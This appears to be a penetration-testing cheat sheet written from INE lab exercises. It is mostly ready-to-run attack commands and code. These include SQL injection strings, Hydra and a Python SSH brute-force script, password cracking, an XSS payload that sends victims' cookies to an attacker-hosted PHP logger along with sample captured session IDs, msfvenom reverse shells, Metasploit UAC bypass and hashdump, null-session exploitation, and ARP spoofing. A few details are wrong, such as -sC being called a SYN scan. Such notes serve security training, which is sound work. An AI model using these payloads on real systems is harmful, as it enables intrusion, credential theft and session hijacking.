Enumeration
IP check
Check your connected interfaces and IPs
Use ip addr to get the list of interfaces and their ips
Route
Get Network/s of IP-Address to test
View the network to test using route
Only display the required Network to test
route | grep tap0 | cut -d " " -f 1
Add a network to routing table
sudo ip route add 192.168.222.0/24 via 10.175.34.1
grep Command
grep command is used to filter output text
Notations
1
2
-v ==> Used to print any other string which is/are not specified as string in the command
-r ==> recursive files and folders
`cut` Command
cut command is used to seperate words from an output text
Notations
1
2
-d ==> delimeter [used to specify string which are replaced and words are seperated as list]
-f ==> string positions to filter and print as output
`wc` Command
wc is used to count the characters, words, lines etc of a file
Basic Command
wc -m payload.php
Notations
1
2
-m ==> Counts bites length
-l ==> Counts number of lines
fping Scan
fping Host Discovery Scan
fping -a -g <network> 2>/dev/null
Notations
1
2
3
network ==> Network for Host Discovery
Eg : 192.168.99.0/24
192.168.99.0-24
Nmap Scanning
Basic Nmap Syntax
nmap <ip-address>
Notations
1
2
3
4
5
6
7
8
9
10
11
12
13
-sV ==> Service detection Scan
-sC ==> SYN Scan
-O ==> OS Fingerprinting
-oN <File-Name> ==> Save the scan output to a file
-sn ==> ping Scan for host Discovery
-Pn ==> Skip ping scan for host discovery
-v ==> Verbosity Level 1
-vv ==> Verbosity Level 2
-p ==> Port Scan
-p 80 ==> Scan port 80 of the provided IP-Address
-p1-100 ==> Portscan from 1 to 100
-p- ==> Scan every port
-iL <IP-List-File>==> Get IP from defined file name
Basic Nmap Commands used during INE Labs
Host Discovery Scan
sudo nmap -sn 10.100.13.0/24 -v -oN ./nmap/host_discovery.txt
sudo nmap -sn -iL network_list.txt -v -oN ./nmap/host_discovery.txt
Live Hosts Detailed Scan
sudo nmap -sC -sV -Pn -v -iL active_hosts.txt -oN ./nmap/live_hosts_detail_scan-nmap.txt
All Port Scan
sudo nmap -sC -sV -Pn -p- -v -iL active_hosts.txt -oN ./nmap/live_hosts_detail_scan-nmap.txt
Dump Active Hosts from Nmap Host Discovery Output File
cat ./nmap/host_discovery.txt | grep "Nmap scan report for" | grep -v "host down" | cut -d " " -f 5 > active_hosts.txt
Here, active_hosts.txt contains the IP-Addresses of the provided machines to test.
Sample Table of Nmap data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
╔══════════╦══════════════╦════════════════════════════════════════════════════════════╗
║ Protocol ║ Port Numbers ║ Service ║
╠══════════╬══════════════╬════════════════════════════════════════════════════════════╣
║ TCP ║ 22 ║ SSH ║
║ TCP ║ 80, 443 ║ HTTP/HTTPS web server ║
║ TCP ║ 445 ║ Windows shares (SMB), also Linux equivalent -Samba service ║
║ TCP ║ 25 ║ SMTP (Simple Mail Transfer Protocol) ║
║ TCP ║ 21 ║ FTP (File Transfer Protocol) ║
║ TCP ║ 137-139 ║ Windows NetBIOS services ║
║ TCP ║ 1433-1434 ║ 1433-1434 MSSQL Database ║
║ TCP ║ 3306 ║ MySQL Database ║
║ TCP ║ 8080, 843 ║ HTTP(s) web server, HTTP Proxy ║
║ UDP ║ 53 ║ DNS ║
╚══════════╩══════════════╩════════════════════════════════════════════════════════════╝
SQL Injections
Basic SQL Injection Strings
Boolean Attacks
' OR 1=1; -- -
sqlmap
Basic sqlmap command
Scanning URL [GET Parameter]
sqlmap -u <url-to-check>
Notations
1
2
3
4
5
6
7
8
-u ==> specify url to check
-p ==> parameter to specify [eg, id]
--technique=U ==> Use Union Attacks
--technique=B ==> Use Boolean Attacks
--tables ==> Dump tables
-D ==> Specify Name of the Database
-T ==> Table Name to dump
--dump ==> Dump the content from the Database
JSQL Injection [GUI Software]
JSQL GUI is a GUI application that can fetch database from sql injection, From GET request [the parameter being in the URL as injection.php?id=123]
Bruteforce Attacks
Bruteforce Wordlists Suggested in INE LABS
USERNAME LIST 1: /usr/share/ncrack/minimal.usr
PASSWORD LIST 1: /usr/share/seclists/Passwords/rockyou-10.txt
PASSWORD LIST 2: /usr/share/seclists/Passwords/rockyou-15.txt
Hydra
Attacking telnet service
hydra -L user_list.txt -P password_list.txt telnet://target.server
Attacking http-get service
hydra -L user_list.txt -P password_list.txt http-get://target.server
Attacking ssh service
hydra -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-15.txt ssh://192.168.99.22:22
Notations
1
2
3
4
5
6
7
8
-l ==> Password string to use
-L ==> Define List of usernames stored in a File
-p ==> Password string to use
-P ==> Define List of passwords stored in a File
telnet:// ==> used for telnet connection
http-get:// ==> used for http-get requests
Bruteforce Scripts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# Quick SSH password Checker
import socket
import ssh2
import paramiko
import socket
import time
from colorama import init, Fore
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE
# Username file
user_file = open("./SSH/recheck_userlist.txt", "r")
user_list = user_file.readlines()
user_file.close()
# Password file
pass_file = open("./SSH/recheck_passlist.txt", "r")
pass_list = pass_file.readlines()
pass_file.close()
# HOST
host = "192.168.99.22"
def is_ssh_open(hostname, username, password):
# initialize SSH client
client = paramiko.SSHClient()
# add to know hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password, timeout=3)
except socket.timeout:
# this is when host is unreachable
print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
return False
except paramiko.AuthenticationException:
print(f"[!] Invalid credentials for {username}:{password}")
return False
except paramiko.SSHException:
print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
# sleep for a minute
time.sleep(60)
return is_ssh_open(hostname, username, password)
else:
# connection was established successfully
print(f"{GREEN}[+] Found combo: HOSTNAME: {hostname} | USERNAME: {username} | PASSWORD: {password}{RESET}")
return True
try:
for user_id in range(len(user_list)):
is_ssh_open(host, user_list[user_id].replace("\n",""), pass_list[user_id].replace("\n", ""))
except KeyboardInterrupt:
exit()
Basic Bruteforce Algorithm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# ALGORITHM [Bruteforce]
password_found = false
password_length = 1
while password_found == false
do
while can_create_password_of_length(password_length)
do
password = create_password_of_length(password_length)
if (hash(password) match attacked_hash)
then
password_found = true
done
password_length = password_length +1
done
Password Cracking
Hash Identification
1
2
HashID
Name-That-Hash [https://github.com/HashPals/Name-That-Hash]
John The Ripper
Basic Command
john <hash-file>
Commands Used in INE LABS
john -incremental -users:<users list> <file to crack>
john -incremental -users:victim passwd_and_shadow_hashes.john
Show Already Cracked Passwords
john --show passwd_and_shadow_hashes.john
Show Supported Formats in john
john --list=formats
Regular commands
john --wordlist=/usr/share/wordlists/rockyou.txt password_hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt user_password_hashes.txt --format=NT
Notations
1
2
3
4
5
6
7
-incremental ==> Use pure Bruteforce attack
[It require a lot of time to crack passwords]
--wordlist ==> Wordlist File to use [Dictionary Attacks]
--format ==> Type of hash to test for
NT ==> For Windows hashdump
--list ==> list data according to need
-users:<username> ==> user of the password to crack
Processing /etc/shadow and /etc/passwd file to john format
unshadow passwd shadow > passwd_and_shadow_hashes.john
XSS Attacks [Cross-Site Scripting Attacks]
Only Works when website is not HTTPOnly
XSS Scripts
Basic XSS Payloads
1
2
</b><img src=x onerror=alert(document.domain)></img><b>
</b><script>alert(document.domain)</script><b>
Open local File Server
Open local File server Using PHP
php -S 0.0.0.0:80
Open local File server Using PHP
python3 -m http.server 80
Get Cookies As Request
Script Used in Attacker System for hosting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
PAYLOAD to be used :
<script> var i = new Image(); i.src="http://<url_where_this_script_is_placed>/get-data.php?cookie="+escape(document.cookie)</script>
*/
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_Server['HTTP_USER_AGENT'];
$fp = fopen('gathered_info.txt', 'a');
fwrite($fp, $ip.' '.$browser." \n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])." \n\n");
fclose($fp);
?>
Strings(Cookie requests) Stored in gathered_info.txt File
1
2
3
4
5
6
7
8
9
10
11
12
13
14
192.168.99.100
cookie=PHPSESSID=3udrbq5j2km5spea10bu7lri07
192.168.99.11
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0
192.168.99.100
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0
192.168.99.11
cookie=PHPSESSID=dte29r9stjinkki7hlgt3iqe54
192.168.99.11
cookie=PHPSESSID=vkhfn0hno94cpg84m0elb7d1d2
Other Resources
1
2
3
4
5
6
7
8
Websites to practice XSS attacks:
[1] hack.me
Resources:
[1] The Web Application Hacker's Handbook
[2] OWASP - XSS
Null Session Attacks</b>
Null Session Attack Tools
1
2
3
4
5
[1] enum4linux
[2] smbclient
[3] winfo
[4] enum
[5] NET USE
Enumeration and Exploitation Using smbclient
Share Enumeration can be performed using tools provided by Samba Suite
smbclient is an FTP like client to access Windows shares; this tool can, among other things, enumerate the shares provided by a host
Command Example
smbclient -L //10.130.40.80 -N
Checking for Null Sessions with Linux
We can also perform the very same checks by using smbclient:
smbclient //10.130.40.80/IPC$ -N
smbclient //10.130.40.80/C$ -N
Exploiting Null Sessions with winfo
Winfo is another command line utility we can use to automate null session exploitation. To use it, you just need to specify the target IP address and use the -n command line switch to tell the tool to use null sessions.
winfo is available in packetstorm
Basic Command Syntax
winfo <ip-address> -n
Notation
1
-n ==> Null Sessions
Exploiting Null Sessions with enum
** Please Note ** It will note administrative shares too.
enum is available in packetstorm
enum -S <ip-address>
enum -U <ip-address>
enum -P <ip-address>
Notations
1
2
3
4
-S ==> Enumerate the Shares of a Machine
-U ==> Enumerate the Users of a Machine
-P ==> Let us see the Password Policy if wwe want to mount the network
[Authentication Attacks]
Enumerate Using nmblookup
To perform the same operations of nbstat, we can use nmblookup with the same command line switch:
Command Syntax
nmblookup -A <target-IP-Address>
Enumerate using NET VIEW
Once an attacker knows that a machine has File Server service running, they can enumerate the shares by using the NET VIEW command
Command Syntax
NET VIEW <target-IP>
Checking Null Sessions with Windows</u>
To connect, we have to type the following command in a Windows shell:
NET USE \\<target-IP-address>\IPC$ '' /u:''
This tells Windows to connect to the IPC$ share by using an empty password and an empty username!
Reverse Connection</b>
Netcat
Basic Netcat Command
nc -lnvp <port> [In the Attacker Machine]
Metasploit
Generate PHP reverse shell [msfvenom]
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -o meterpreter.php
1
2
3
4
5
6
7
$ msfconsole
msf5> use exploit/multi/handler
msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp
msf5 exploit(handler)> set lhost 192.168.0.1
msf5 exploit(handler)> set lport 4444
msf5 exploit(handler)> exploit
Add routing protocols in msfconsole
meterpreter> run autoroute -s 172.16.50.0/24
Use SSH Bruteforce in msfconsole
1
2
3
4
5
6
7
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run
View Active sessions using sessions command
Interact with sessions using sessions -i <number> Background a shell using meterpreter> background command
Note that in modern Windows Operating systems, the User Account Control policy prevents privilege escalation.
1
2
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.
Bypassing UAC
You can bypass that restriction by using the bypassuac module.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > background
[*] backgrounding session1 …
msf exploit(handler) > search bypassuac
msf exploit(handler) > use exploit/windows/local/bypassuac
# Configuring the module
msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
# Bypassing UAC
The new session has the UAC policy disabled, so the getsystem command works !
meterpreter > getuid
Server username: els\els
meterpreter > getsystem
…got system (via technique 1)
Dumping the Password Database
For example, you can dump the passwords database and save it for an offline cracking session. The hashdump module dumps the password database of a Windows machine
meterpreter > hashdump
Collection of Reverse shell [Commands]
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md
Interactive Shell
python/python3 Interactive Shell
Check if python/python3 is available in system
which python which python3
python -c 'import pty;pty.spawn("/bin/bash")'
Bash Interactive Shell
bash -i
SHELL=/bin/bash script -q /dev/null
Find Commands</b>
Find files
find / -type f -name "*flag.txt" 2>/dev/null
Find SUID Files
find / -user root -perm -4000 -print 2>/dev/null
sudo -l
ARP Spoofing</b>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
## Dsniff Arpspoof
Before running the tool, we have to enable the Linux Kernal IP Forwarding, a feature that transforms a Linux box into a router.
By enabling IP forwarding, you tell your machine to forward the packets you intercept to the real destination host.
# Command to enable the ip forward feature
echo 1 > /proc/sys/net/ipv4/ip_forward
We can then run arpspoof
# Command to use arpspoof
arpspoof -I <interface> -t <target> -r <host>
<interface> = tap0, eth0, etc
<target> = victim ip
<host> = host from where the packets are send
# To intercept traffic between 192.168.4.11 and 192.168.4.16 the command to be used is
echo 1 > /proc/sys/net/ipv4/ip_forward
Arpspoof -I tap0 -t 192.168.4.11 -r 192.168.4.16
We can then run Wireshark to intercept the traffic
Vulnerability Scanners
1
2
3
4
[1] Nessus
[2] OpenVAS
[3] Nexpose
[4] GFI LAN Guard
Google Dorking</b>
Useful Commands and Meaning
1
2
3
4
5
6
7
8
9
10
╔═══════════════╦═════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ Command ║ Meaning ║
╠═══════════════╬═════════════════════════════════════════════════════════════════════════════════════════════════════════════╣
║ site: ║ You can use this command to include only results on a given hostname ║
║ intitle: ║ This command filters according to the title of a page ║
║ inurl: ║ Similar to intitle but works on the URL of a resource. ║
║ filetype: ║ This filters by using the file extension of a resource. For example .pdf or .xls. ║
║ AND, OR, &, | ║ You can use logical operators to combine your expressions. For example site:example.com OR site:another.com ║
║ - ║ You can use this character to filter out a keyword or a command's result from the query ║
╚═══════════════╩═════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Google Dorking Examples
-inurl :(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf
Google Dorking Database
https://www.exploit-db.com/google-hacking-database
Thankyou, for reading my writeup :)
Hope, I would see you in my next writeup.
Support Me if you want to.